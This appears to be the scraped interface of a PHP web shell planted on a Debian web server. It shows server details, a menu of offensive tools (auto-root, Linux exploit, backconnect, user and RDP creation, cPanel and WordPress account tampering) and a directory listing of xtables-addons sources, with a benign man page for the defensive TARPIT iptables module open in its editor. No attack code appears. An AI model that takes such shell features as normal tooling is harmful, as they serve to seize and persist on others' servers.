Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.14.254.103
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
xtables-addons-2.12 /
extensions /
[ HOME SHELL ]
Name
Size
Permission
Action
ACCOUNT
[ DIR ]
drwxr-xr-x
pknock
[ DIR ]
drwxr-xr-x
Kbuild
1020
B
-rw-r--r--
Makefile
14.31
KB
-rw-r--r--
Makefile.am
910
B
-rw-r--r--
Makefile.in
13.55
KB
-rw-r--r--
Mbuild
989
B
-rw-r--r--
compat_skbuff.h
325
B
-rw-r--r--
compat_user.h
262
B
-rw-r--r--
compat_xtables.c
1.18
KB
-rw-r--r--
compat_xtables.h
2.52
KB
-rw-r--r--
compat_xtnu.h
1.97
KB
-rw-r--r--
libxt_CHAOS.c
2.56
KB
-rw-r--r--
libxt_CHAOS.man
1
KB
-rw-r--r--
libxt_DELUDE.c
1.11
KB
-rw-r--r--
libxt_DELUDE.man
286
B
-rw-r--r--
libxt_DHCPMAC.c
2.55
KB
-rw-r--r--
libxt_DHCPMAC.man
1.2
KB
-rw-r--r--
libxt_DNETMAP.c
6.62
KB
-rw-r--r--
libxt_DNETMAP.man
7.71
KB
-rw-r--r--
libxt_ECHO.c
1.03
KB
-rw-r--r--
libxt_ECHO.man
141
B
-rw-r--r--
libxt_IPMARK.c
4.71
KB
-rw-r--r--
libxt_IPMARK.man
1.99
KB
-rw-r--r--
libxt_LOGMARK.c
3.27
KB
-rw-r--r--
libxt_LOGMARK.man
312
B
-rw-r--r--
libxt_SYSRQ.c
844
B
-rw-r--r--
libxt_SYSRQ.man
3.67
KB
-rw-r--r--
libxt_TARPIT.c
2.75
KB
-rw-r--r--
libxt_TARPIT.man
2.55
KB
-rw-r--r--
libxt_condition.c
2.5
KB
-rw-r--r--
libxt_condition.man
175
B
-rw-r--r--
libxt_dhcpmac.c
2.52
KB
-rw-r--r--
libxt_dhcpmac.man
207
B
-rw-r--r--
libxt_fuzzy.c
3.37
KB
-rw-r--r--
libxt_fuzzy.man
263
B
-rw-r--r--
libxt_geoip.c
8.21
KB
-rw-r--r--
libxt_geoip.man
1
KB
-rw-r--r--
libxt_gradm.c
2.3
KB
-rw-r--r--
libxt_gradm.man
225
B
-rw-r--r--
libxt_iface.c
7.21
KB
-rw-r--r--
libxt_iface.man
1.39
KB
-rw-r--r--
libxt_ipp2p.c
7.36
KB
-rw-r--r--
libxt_ipp2p.man
1.52
KB
-rw-r--r--
libxt_ipv4options.c
4.32
KB
-rw-r--r--
libxt_ipv4options.man
1.44
KB
-rw-r--r--
libxt_length2.c
4.69
KB
-rw-r--r--
libxt_length2.man
695
B
-rw-r--r--
libxt_lscan.c
2.64
KB
-rw-r--r--
libxt_lscan.man
1.58
KB
-rw-r--r--
libxt_psd.c
5.34
KB
-rw-r--r--
libxt_psd.man
720
B
-rw-r--r--
libxt_quota2.c
4.06
KB
-rw-r--r--
libxt_quota2.man
1.6
KB
-rw-r--r--
mac.c
572
B
-rw-r--r--
xt_CHAOS.c
6.29
KB
-rw-r--r--
xt_CHAOS.h
249
B
-rw-r--r--
xt_DELUDE.c
4.96
KB
-rw-r--r--
xt_DHCPMAC.c
4.18
KB
-rw-r--r--
xt_DHCPMAC.h
311
B
-rw-r--r--
xt_DNETMAP.c
25.22
KB
-rw-r--r--
xt_DNETMAP.h
402
B
-rw-r--r--
xt_ECHO.c
6.98
KB
-rw-r--r--
xt_IPMARK.c
2.75
KB
-rw-r--r--
xt_IPMARK.h
252
B
-rw-r--r--
xt_LOGMARK.c
3.96
KB
-rw-r--r--
xt_LOGMARK.h
209
B
-rw-r--r--
xt_SYSRQ.c
9.75
KB
-rw-r--r--
xt_TARPIT.c
14.94
KB
-rw-r--r--
xt_TARPIT.h
258
B
-rw-r--r--
xt_condition.c
6.75
KB
-rw-r--r--
xt_condition.h
276
B
-rw-r--r--
xt_fuzzy.c
4.65
KB
-rw-r--r--
xt_fuzzy.h
397
B
-rw-r--r--
xt_geoip.c
8.73
KB
-rw-r--r--
xt_geoip.h
1.34
KB
-rw-r--r--
xt_gradm.h
108
B
-rw-r--r--
xt_iface.c
3.32
KB
-rw-r--r--
xt_iface.h
596
B
-rw-r--r--
xt_ipp2p.c
23.63
KB
-rw-r--r--
xt_ipp2p.h
995
B
-rw-r--r--
xt_ipv4options.c
1.96
KB
-rw-r--r--
xt_ipv4options.h
581
B
-rw-r--r--
xt_length2.c
6.99
KB
-rw-r--r--
xt_length2.h
457
B
-rw-r--r--
xt_lscan.c
7.85
KB
-rw-r--r--
xt_lscan.h
200
B
-rw-r--r--
xt_psd.c
14.2
KB
-rw-r--r--
xt_psd.h
792
B
-rw-r--r--
xt_quota2.c
9
KB
-rw-r--r--
xt_quota2.h
478
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : libxt_TARPIT.man
.PP Captures and holds incoming TCP connections using no local per-connection resources. .PP TARPIT only works at the TCP level, and is totally application agnostic. This module will answer a TCP request and play along like a listening server, but aside from sending an ACK or RST, no data is sent. Incoming packets are ignored and dropped. The attacker will terminate the session eventually. This module allows the initial packets of an attack to be captured by other software for inspection. In most cases this is sufficient to determine the nature of the attack. .PP This offers similar functionality to LaBrea <http://www.hackbusters.net/LaBrea/> but does not require dedicated hardware or IPs. Any TCP port that you would normally DROP or REJECT can instead become a tarpit. .TP \fB\-\-tarpit\fP This mode completes a connection with the attacker but limits the window size to 0, thus keeping the attacker waiting long periods of time. While he is maintaining state of the connection and trying to continue every 60-240 seconds, we keep none, so it is very lightweight. Attempts to close the connection are ignored, forcing the remote side to time out the connection in 12-24 minutes. This mode is the default. .TP \fB\-\-honeypot\fP This mode completes a connection with the attacker, but signals a normal window size, so that the remote side will attempt to send data, often with some very nasty exploit attempts. We can capture these packets for decoding and further analysis. The module does not send any data, so if the remote expects an application level response, the game is up. .TP \fB\-\-reset\fP This mode is handy because we can send an inline RST (reset). It has no other function. .PP To tarpit connections to TCP port 80 destined for the current machine: .IP \-A INPUT \-p tcp \-m tcp \-\-dport 80 \-j TARPIT .PP To significantly slow down Code Red/Nimda-style scans of unused address space, forward unused ip addresses to a Linux box not acting as a router (e.g. "ip route 10.0.0.0 255.0.0.0 ip.of.linux.box" on a Cisco), enable IP forwarding on the Linux box, and add: .IP \-A FORWARD \-p tcp \-j TARPIT .IP \-A FORWARD \-j DROP .PP NOTE: If you use the conntrack module while you are using TARPIT, you should also use unset tracking on the packet, or the kernel will unnecessarily allocate resources for each TARPITted connection. To TARPIT incoming connections to the standard IRC port while using conntrack, you could: .IP \-t raw \-A PREROUTING \-p tcp \-\-dport 6667 \-j CT \-\-notrack .IP \-A INPUT \-p tcp \-\-dport 6667 \-j NFLOG .IP \-A INPUT \-p tcp \-\-dport 6667 \-j TARPIT
Close
